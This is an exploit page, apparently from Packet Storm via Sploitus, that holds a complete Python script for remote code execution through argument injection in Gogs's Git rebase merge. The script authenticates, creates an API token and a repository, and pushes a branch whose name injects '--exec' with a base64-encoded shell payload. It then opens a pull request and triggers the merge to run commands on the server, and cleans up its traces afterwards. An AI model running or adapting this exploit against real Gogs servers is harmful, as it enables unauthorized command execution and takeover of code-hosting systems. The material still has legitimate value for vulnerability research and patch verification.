Share
## https://sploitus.com/exploit?id=PACKETSTORM:223338
==================================================================================================================================
| # Title : Gogs Git Rebase Argument Injection RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://github.com/gogs/gogs |
==================================================================================================================================
[+] Summary : This Python script is an exploit framework targeting an argument injection vulnerability in Gogs reported as GHSA-qf6p-p7ww-cwr9 in Gogs <= 0.14.2 and <= 0.15.0+dev.
[+] POC :
#!/usr/bin/env python3
import os
import re
import json
import tempfile
import shutil
import subprocess
import urllib.parse
from typing import Optional, Dict, List, Tuple
from html.parser import HTMLParser
import requests
from requests.exceptions import ConnectionError, Timeout
class CSRFExtractor(HTMLParser):
"""Extract CSRF token from HTML response"""
def __init__(self):
super().__init__()
self.csrf_token = None
def handle_starttag(self, tag, attrs):
if tag == 'input':
attrs_dict = dict(attrs)
if attrs_dict.get('name') == '_csrf':
self.csrf_token = attrs_dict.get('value')
class GogsExploit:
"""Gogs Git Rebase Argument Injection RCE Exploit"""
COMMIT_TO_VERSION = {
'5dcb6c64bdf61e38dbdbb941c1d69789c560d0fb': '0.14.2',
'f5c8030c1fd936f3e0e9f774e3c7c39fd102f56f': '0.14.1',
'36c26c4ccc3ca0339db53eb1fa41e4e86b55163d': '0.14.0',
'd958a47a0e9d8747e399c687fdb3ec64a3b1a736': '0.13.4',
'5084b4a9b77a506f5e287e82e945e1c6882b827a': '0.13.3',
'593c7b6db601c68d16b2fb9a7e1194cb816f5efb': '0.13.2',
'0c40e600a275d490481cfeea53705810fbe94d9b': '0.13.1',
'8c21874c00b6100d46b662f65baeb40647442f42': '0.13.0',
'c9fba3cb30af0789fcf89098dfcb8f2286ee7d3b': '0.12.11',
'1ce5171ae170750298c150874e718740dd7ef69f': '0.12.10',
'012a1ba19ed2f8f5185be4254f655ba6c4b34db2': '0.12.9',
'7f8799c01f264eb7770766621fb68debee414b68': '0.12.8',
'd06ba7e527fcc462aecdb660ce001e87d94f024c': '0.12.7',
'26395294bdef382b577fd60234e5bb14f4090cc8': '0.12.6'
}
def __init__(self, target_url: str, username: str, password: str,
exploit_method: str = 'own_repo', repo_owner: Optional[str] = None,
repo_name: Optional[str] = None, enable_rebase: bool = True,
payload: str = '', ssl: bool = False, wfs_delay: int = 30):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.exploit_method = exploit_method
self.repo_owner = repo_owner
self.repo_name = repo_name
self.enable_rebase = enable_rebase
self.payload = payload
self.ssl = ssl
self.wfs_delay = wfs_delay
self.session = requests.Session()
self.api_token = None
self.need_cleanup = False
self.tmpdir = None
self.repo_path = None
self.malicious_branch = None
self.feature_branch = None
self.payload_file = None
self.bat_file = None
self.payload_content = None
self.pr_number = None
self.default_branch = 'master'
def _normalize_uri(self, *parts) -> str:
"""Normalize URI by joining parts"""
return '/'.join(str(p).strip('/') for p in parts if p)
def _request(self, method: str, path: str, **kwargs) -> Optional[requests.Response]:
"""Make HTTP request with proper URI construction"""
url = f"{self.target_url}{path}" if path.startswith('/') else f"{self.target_url}/{path}"
try:
return self.session.request(method, url, timeout=30, verify=self.ssl, **kwargs)
except (ConnectionError, Timeout) as e:
print(f"Request failed: {e}")
return None
def _extract_csrf(self, response: requests.Response) -> str:
"""Extract CSRF token from HTML response"""
if not response:
raise ValueError("No response to extract CSRF from")
parser = CSRFExtractor()
parser.feed(response.text)
if not parser.csrf_token:
raise ValueError("CSRF token not found in response")
return parser.csrf_token
def _basic_auth(self) -> str:
"""Create Basic authentication header"""
import base64
credentials = f"{self.username}:{self.password}"
encoded = base64.b64encode(credentials.encode()).decode()
return f"Basic {encoded}"
def _git_available(self) -> bool:
"""Check if git is installed"""
try:
subprocess.run(['git', '--version'], capture_output=True, check=True)
return True
except (subprocess.CalledProcessError, FileNotFoundError):
return False
def _run_git(self, args: List[str], cwd: Optional[str] = None) -> Tuple[str, bool]:
"""Run git command and return (output, success)"""
env = {'GIT_TERMINAL_PROMPT': '0'}
try:
result = subprocess.run(
['git'] + args, cwd=cwd, env=env,
capture_output=True, text=True, check=False
)
if result.returncode != 0:
print(f"Git {' '.join(args)} failed: {result.stderr.strip()}")
return result.stderr, False
return result.stdout, True
except Exception as e:
print(f"Git error: {e}")
return str(e), False
def check(self) -> Tuple[bool, str]:
"""Check if target is vulnerable"""
res = self._request('GET', '/')
if not res:
return False, "Target did not respond"
if not re.search(r'<meta +name="author" +content="Gogs"', res.text):
return False, "Target does not appear to be running Gogs"
version = None
hash_match = re.search(r'gogs\.min\.css\?v=([a-f0-9]{40})', res.text)
if hash_match:
commit_hash = hash_match.group(1)
version = self.COMMIT_TO_VERSION.get(commit_hash)
if version:
ver_parts = list(map(int, version.split('.')))
if ver_parts <= [0, 14, 2]:
return True, f"Gogs {version} detected (vulnerable)"
else:
return False, f"Gogs {version} detected (not vulnerable)"
return True, "Gogs detected, but could not determine version"
def _gogs_login(self) -> None:
"""Login to Gogs web interface"""
res = self._request('POST', '/user/login',
data={'user_name': self.username, 'password': self.password},
allow_redirects=False)
if not res or res.status_code != 302:
raise Exception("Login failed - check credentials")
def _create_api_token(self) -> None:
"""Create API token for authenticated requests"""
preflight = self._request('GET', '/api/v1')
if not preflight:
raise Exception("Gogs API not responding")
import base64
auth_header = self._basic_auth()
import random
import string
token_name = f"msf_{''.join(random.choices(string.ascii_lowercase, k=8))}"
res = self._request('POST', f'/api/v1/users/{self.username}/tokens',
headers={'Authorization': auth_header},
json={'name': token_name})
if not res or res.status_code != 201:
raise Exception(f"API token creation failed (HTTP {res.status_code if res else 'None'})")
self.api_token = res.json()['sha1']
print(f"[*] API token created: {self.api_token[:10]}...")
def _api_request(self, method: str, path: str, data: Optional[Dict] = None) -> Optional[requests.Response]:
"""Make authenticated API request"""
headers = {'Authorization': f'token {self.api_token}'}
if data:
return self._request(method, path, headers=headers, json=data)
return self._request(method, path, headers=headers)
def _create_repo(self) -> None:
"""Create a new repository"""
import random
import string
repo_name = f"{''.join(random.choices(string.ascii_lowercase, k=4))}-{''.join(random.choices(string.ascii_lowercase, k=4))}"
self.repo_name = repo_name
self.repo_path = f"{self.username}/{self.repo_name}"
res = self._api_request('POST', '/api/v1/user/repos',
{'name': repo_name, 'private': True, 'default_branch': 'master'})
if not res or res.status_code != 201:
raise Exception(f"Repo creation failed: {res.status_code if res else 'None'}")
def _enable_rebase_merge(self) -> None:
"""Enable rebase merge in repository settings"""
res = self._request('POST', f'/{self.repo_path}/settings',
data={'action': 'advanced', 'enable_pulls': 'on', 'pulls_allow_rebase': 'on'},
allow_redirects=False)
if not res or res.status_code not in [200, 302]:
raise Exception("Failed to enable rebase merge")
def _validate_existing_repo(self) -> None:
"""Validate existing repository is accessible"""
res = self._api_request('GET', f'/api/v1/repos/{self.repo_path}')
if not res or res.status_code != 200:
raise Exception(f"Repository {self.repo_path} not found or not accessible")
repo_info = res.json()
self.default_branch = repo_info.get('default_branch', 'master')
print(f"[*] Default branch: {self.default_branch}")
def _try_enable_rebase(self) -> None:
"""Try to enable rebase merge in existing repository"""
print("[*] Attempting to enable rebase merge in repository settings")
settings_uri = self._normalize_uri(self.repo_path, 'settings')
res = self._request('GET', f'/{settings_uri}')
if not res or res.status_code != 200:
print("[-] Could not access repository settings (may require repo admin)")
return
csrf = self._extract_csrf(res)
res = self._request('POST', f'/{settings_uri}',
data={'_csrf': csrf, 'action': 'advanced',
'enable_pulls': 'on', 'pulls_allow_rebase': 'on'},
allow_redirects=False)
if res and res.status_code in [200, 302]:
print("[+] Rebase merge enabled")
else:
print("[-] Could not enable rebase merge")
def _build_clone_url(self) -> str:
"""Build git clone URL with credentials"""
user_enc = urllib.parse.quote(self.username, safe='')
pass_enc = urllib.parse.quote(self.password, safe='')
from urllib.parse import urlparse
parsed = urlparse(self.target_url)
authority = f"{parsed.hostname}:{parsed.port}" if parsed.port else parsed.hostname
scheme = 'https' if self.ssl else 'http'
repo_path = self.repo_path.rstrip('/')
return f"{scheme}://{user_enc}:{pass_enc}@{authority}/{repo_path}.git"
def _setup_branches_via_git(self) -> None:
"""Setup branches using local git"""
self.tmpdir = tempfile.mkdtemp(prefix='msf_gogs_')
workdir = os.path.join(self.tmpdir, 'work')
clone_url = self._build_clone_url()
if self.exploit_method == 'own_repo':
self._run_git(['init', workdir])
self._run_git(['remote', 'add', 'origin', clone_url], workdir)
else:
self._run_git(['clone', clone_url, workdir])
import random
import string
self._run_git(['config', 'user.email', f"{''.join(random.choices(string.ascii_lowercase, k=8))}@example.com"], workdir)
self._run_git(['config', 'user.name', ''.join(random.choices(string.ascii_lowercase, k=8))], workdir)
if self.exploit_method == 'own_repo':
with open(os.path.join(workdir, 'README.md'), 'w') as f:
f.write(f"# {self.repo_name}\n")
self._run_git(['add', '.'], workdir)
self._run_git(['commit', '-m', 'init'], workdir)
self._run_git(['push', '-u', 'origin', 'master'], workdir)
self.feature_branch = f"feature-{''.join(random.choices(string.ascii_lowercase, k=6))}"
self._run_git(['checkout', '-b', self.feature_branch], workdir)
with open(os.path.join(workdir, 'feature.txt'), 'w') as f:
f.write(''.join(random.choices(string.ascii_lowercase, k=8)))
self._run_git(['add', '.'], workdir)
self._run_git(['commit', '-m', 'feature'], workdir)
self._run_git(['push', 'origin', self.feature_branch], workdir)
base_branch = 'master' if self.exploit_method == 'own_repo' else self.default_branch
self._run_git(['checkout', base_branch], workdir)
with open(os.path.join(workdir, 'diverge.txt'), 'w') as f:
f.write(''.join(random.choices(string.ascii_lowercase, k=8)))
import base64
if self.payload:
if 'win' in self.payload.lower():
import random
rand_name = ''.join(random.choices(string.ascii_lowercase, k=6))
self.payload_content = self.payload
self.payload_file = f".{rand_name}"
self.bat_file = f".{rand_name}.bat"
self.malicious_branch = f"--exec=sh${{IFS}}{self.payload_file}"
with open(os.path.join(workdir, self.payload_file), 'w') as f:
f.write(f"cmd.exe //c {self.bat_file} </dev/null >/dev/null 2>&1 &\n")
with open(os.path.join(workdir, self.bat_file), 'w') as f:
f.write(self.payload_content + "\n")
else:
wrapped = f"({self.payload}) </dev/null >/dev/null 2>&1 &"
b64 = base64.b64encode(wrapped.encode()).decode()
padding = 0
while '//' in b64 and padding < 50:
padding += 1
b64 = base64.b64encode((' ' * padding + wrapped).encode()).decode()
self.malicious_branch = f"--exec=echo${{IFS}}{b64}|base64${{IFS}}-d|sh"
self._run_git(['add', '.'], workdir)
self._run_git(['commit', '-m', 'diverge'], workdir)
self._run_git(['push', 'origin', f"HEAD:refs/heads/{self.malicious_branch}"], workdir)
print(f"[+] Malicious branch: {self.malicious_branch}")
print(f"[+] Feature branch: {self.feature_branch}")
def _create_pull_request(self) -> str:
"""Create pull request for the feature branch"""
encoded_branch = urllib.parse.quote(self.malicious_branch, safe='')
compare_uri = f"/{self.repo_path}/compare/{encoded_branch}...{self.feature_branch}"
import random
import string
res = self._request('POST', compare_uri,
data={'title': ''.join(random.choices(string.ascii_lowercase, k=6)),
'content': '', 'assignee_id': '0', 'milestone_id': '0'},
allow_redirects=False)
if not res:
raise Exception("Compare page unreachable")
if res.status_code in [302, 303]:
location = res.headers.get('Location', '')
pr_num = location.rstrip('/').split('/')[-1]
if pr_num.isdigit():
return pr_num
res = self._api_request('GET', f'/api/v1/repos/{self.repo_path}/pulls?state=open')
if res and res.status_code == 200:
pulls = res.json()
if pulls:
return str(pulls[-1]['number'])
raise Exception("PR creation failed")
def _trigger_rebase_merge(self) -> None:
"""Trigger the rebase merge to execute payload"""
merge_uri = f"/{self.repo_path}/pulls/{self.pr_number}/merge"
pr_uri = f"/{self.repo_path}/pulls/{self.pr_number}"
res = self._request('GET', f'/{pr_uri}')
if not res:
raise Exception("Could not load PR page")
csrf = self._extract_csrf(res)
self._request('POST', f'/{merge_uri}',
params={'merge_style': 'rebase_before_merging'},
data={'_csrf': csrf, 'commit_description': ''},
timeout=self.wfs_delay)
def _cleanup_own_repo(self) -> None:
"""Delete the temporary repository"""
print(f"[*] Cleaning up - deleting repository {self.repo_name}")
self._api_request('DELETE', f'/api/v1/repos/{self.repo_path}')
verify = self._api_request('GET', f'/api/v1/repos/{self.repo_path}')
if verify and verify.status_code == 404:
print(f"[+] Repository {self.repo_name} deleted")
else:
print(f"[-] Repository may still exist. Delete {self.repo_path} manually.")
def _delete_remote_branches(self) -> None:
"""Delete malicious and feature branches from existing repo"""
if not self.tmpdir:
return
workdir = os.path.join(self.tmpdir, 'work')
if not os.path.isdir(workdir):
return
if self.malicious_branch:
print(f"[*] Deleting malicious branch from {self.repo_path}")
_, success = self._run_git(['push', 'origin', '--delete', f'refs/heads/{self.malicious_branch}'], workdir)
if success:
print("[+] Malicious branch deleted")
else:
print(f"[-] Could not delete malicious branch. Delete it manually from {self.repo_path}")
if self.feature_branch:
print(f"[*] Deleting feature branch from {self.repo_path}")
_, success = self._run_git(['push', 'origin', '--delete', self.feature_branch], workdir)
if success:
print("[+] Feature branch deleted")
else:
print(f"[-] Could not delete feature branch from {self.repo_path}")
def _close_pull_request(self) -> None:
"""Close the pull request"""
if not self.pr_number:
return
pr_page = f"/{self.repo_path}/pulls/{self.pr_number}"
res = self._request('GET', pr_page)
if not res:
print(f"[-] Could not load PR page to close PR #{self.pr_number}")
return
try:
csrf = self._extract_csrf(res)
except ValueError:
print(f"[-] Could not find CSRF token to close PR #{self.pr_number}")
return
comment_uri = f"/{self.repo_path}/issues/{self.pr_number}/comments"
res = self._request('POST', comment_uri,
data={'_csrf': csrf, 'status': 'close', 'content': ''})
if res and res.status_code in [200, 302]:
print(f"[+] PR #{self.pr_number} closed")
else:
print(f"[-] Could not close PR #{self.pr_number}")
def _cleanup_existing_repo(self) -> None:
"""Clean up artifacts from existing repository"""
print(f"[*] Cleaning up artifacts from {self.repo_path}")
self._delete_remote_branches()
self._close_pull_request()
def cleanup(self) -> None:
"""Clean up resources"""
if self.need_cleanup:
if self.exploit_method == 'own_repo':
self._cleanup_own_repo()
else:
self._cleanup_existing_repo()
if self.tmpdir and os.path.isdir(self.tmpdir):
shutil.rmtree(self.tmpdir)
print("[*] Local temp directory cleaned up")
if self.api_token:
print("[!] API token persists on the target (Gogs API does not support token deletion)")
def exploit(self) -> bool:
"""Execute the exploit"""
if not self._git_available():
print("[-] Local git installation required but not found")
return False
if self.exploit_method == 'existing_repo':
if not self.repo_owner or not self.repo_name:
print("[-] REPO_OWNER and REPO_NAME required for existing_repo method")
return False
self.repo_path = f"{self.repo_owner}/{self.repo_name}"
print(f"[*] Executing exploit with payload: {self.payload[:50]}...")
print(f"[*] Authenticating as \"{self.username}\"")
self._create_api_token()
self._gogs_login()
print("[+] Authenticated")
if self.exploit_method == 'own_repo':
self._create_repo()
self.need_cleanup = True
print(f"[+] Repository '{self.repo_name}' created")
print("[*] Enabling rebase merge in repository settings")
self._enable_rebase_merge()
print("[+] Rebase merge enabled")
else:
print(f"[*] Using existing repository \"{self.repo_path}\"")
self._validate_existing_repo()
self.need_cleanup = True
if self.enable_rebase:
self._try_enable_rebase()
else:
print("[*] Assuming rebase merge is already enabled")
print("[*] Pushing branches via git")
self._setup_branches_via_git()
print("[+] Branches pushed")
print("[*] Creating pull request")
self.pr_number = self._create_pull_request()
print(f"[+] PR #{self.pr_number} created")
print("[*] Triggering rebase merge")
self._trigger_rebase_merge()
print("[+] Rebase merge triggered, waiting for shell...")
return True
def main():
"""Example usage"""
import argparse
parser = argparse.ArgumentParser(description='Gogs Git Rebase Argument Injection RCE')
parser.add_argument('url', help='Target Gogs URL (e.g., http://localhost:3000)')
parser.add_argument('-u', '--username', required=True, help='Gogs username')
parser.add_argument('-p', '--password', required=True, help='Gogs password')
parser.add_argument('-m', '--method', default='own_repo', choices=['own_repo', 'existing_repo'],
help='Exploit method')
parser.add_argument('--repo-owner', help='Repository owner (for existing_repo)')
parser.add_argument('--repo-name', help='Repository name (for existing_repo)')
parser.add_argument('--payload', required=True, help='Command payload to execute')
parser.add_argument('--ssl', action='store_true', help='Use SSL/TLS')
parser.add_argument('--wfs-delay', type=int, default=30, help='Wait time for shell')
args = parser.parse_args()
exploit = GogsExploit(
target_url=args.url,
username=args.username,
password=args.password,
exploit_method=args.method,
repo_owner=args.repo_owner,
repo_name=args.repo_name,
payload=args.payload,
ssl=args.ssl,
wfs_delay=args.wfs_delay
)
try:
vulnerable, msg = exploit.check()
print(f"[*] Check result: {msg}")
if not vulnerable:
print("[-] Target does not appear vulnerable")
return
success = exploit.exploit()
if success:
print("[+] Exploit completed successfully")
else:
print("[-] Exploit failed")
except KeyboardInterrupt:
print("\n[*] Interrupted by user")
except Exception as e:
print(f"[-] Error: {e}")
finally:
exploit.cleanup()
if __name__ == '__main__':
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================